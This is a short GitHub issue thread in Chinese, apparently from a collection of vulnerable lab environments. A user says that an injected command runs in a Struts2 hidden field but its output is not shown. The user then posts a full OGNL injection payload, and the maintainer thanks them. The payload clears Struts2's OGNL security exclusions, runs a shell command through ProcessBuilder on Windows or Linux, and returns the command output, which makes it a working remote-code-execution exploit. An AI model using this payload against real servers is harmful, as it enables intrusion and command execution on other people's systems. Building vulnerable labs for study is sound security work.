### ISSUE TITLE
能执行命令但是不能回显示

### ISSUE THREAD

**Issue by b1ueb0y** [Medicean/VulApps#12]
<@s.hidden name="redirectUri" value="%{redirectUri}" />
value这里不会显示执行的结果

**Comment by b1ueb0y** [comment]
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 123456').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ins=#process.getInputStream()).(@org.apache.commons.io.IOUtils@toString(#ins,'UTF-8'))}

**Comment by Medicean** [comment]
非常感谢
